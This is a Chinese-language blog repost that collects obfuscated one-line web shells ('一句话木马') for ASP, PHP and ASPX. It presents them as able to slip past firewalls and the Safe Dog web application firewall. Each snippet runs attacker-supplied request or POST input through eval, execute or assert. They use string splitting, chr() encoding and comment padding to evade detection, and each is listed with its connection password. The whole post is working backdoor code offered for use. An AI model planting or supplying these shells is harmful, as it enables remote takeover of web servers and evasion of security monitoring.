几个变性的asp–过防火墙 过狗效果都不错
1 |
<%Y=request( "x" )%> <%execute(Y)%> |
1 |
<% eval ( eval ( chr (114)+ chr (101)+ chr (113)+ chr (117)+ chr (101)+ chr (115)+ chr (116))( "sz" ))%> |
这个是90sec发的
1 |
<% eval "" &( "e" & "v" & "a" & "l" & "(" & "r" & "e" & "q" & "u" & "e" & "s" & "t" & "(" & "0" & "-" & "2" & "-" & "5" & ")" & ")" )%> |
密码-7
几个变性的php–过防火墙 过狗效果都不错:
1 |
<!--?php $a = str_replace (x, "" , "axsxxsxexrxxt" ); $a ( $_POST [ "sz" ]); ?--> |
1 |
<!--?php $lang = (string)key( $_POST ); $lang ( $_POST [ 'sz' ]); ?--> |
1 |
<!--?php $k = "ass" . "ert" ; $k (${ "_PO" . "ST" } [ 'sz' ]);?--> |
1 |
<!--?php $a = "a" . "s" . "s" . "e" . "r" . "t" ; $a ( $_POST [ "sz" ]); ?--> |
这个是90sec发的
1 |
<!--?php @ $_ = "s" . "s" . /*-/*-*/ "e" . /*-/*-*/ "r" ; @ $_ = /*-/*-*/ "a" . /*-/*-*/ $_ . /*-/*-*/ "t" ; @ $_ /*-/*-*/ ($ /*-/*-*/ { "_P" . /*-/*-*/ "OS" . /*-/*-*/ "T" } [ /*-/*-*/ 0 /*-/*-*/ - /*-/*-*/ 2 /*-/*-*/ - /*-/*-*/ 5 /*-/*-*/ ]);?--> |
密码-7
aspx的 过狗效果不怎么样—不过我认为能支持aspx 百分之8/90支持asp
90sec发的
1 |
<%@ Page Language = Jscript %><% var /*-/*-*/ P /*-/*-*/ = /*-/*-*/ "e" + "v" + /*-/*-*/ "a" + "l" + "(" + "R" + "e" + /*-/*-*/ "q" + "u" + "e" /*-/*-*/ + "s" + "t" + "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]" + "," + "\"" + "u" + "n" + "s" /*-/*-*/ + "a" + "f" + "e" + "\"" + ")" ; eval ( /*-/*-*/ P /*-/*-*/ , /*-/*-*/ "u" + "n" + "s" /*-/*-*/ + "a" + "f" + "e" /*-/*-*/ );%> |
密码-7
1 |
<%@ Page Language= "Jscript" %><% eval (Request.Item[ "sz" ], "unsafe" );%> |
2 |
<script type= "text/javascript" language= "C#" > // <![CDATA[ |
3 |
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y( "add6bb58e139be10" ); |
密码是webadmin
转载请注明:jinglingshu的博客 » 各种过安全狗一句话木马aspx,asp,php一句话【转载】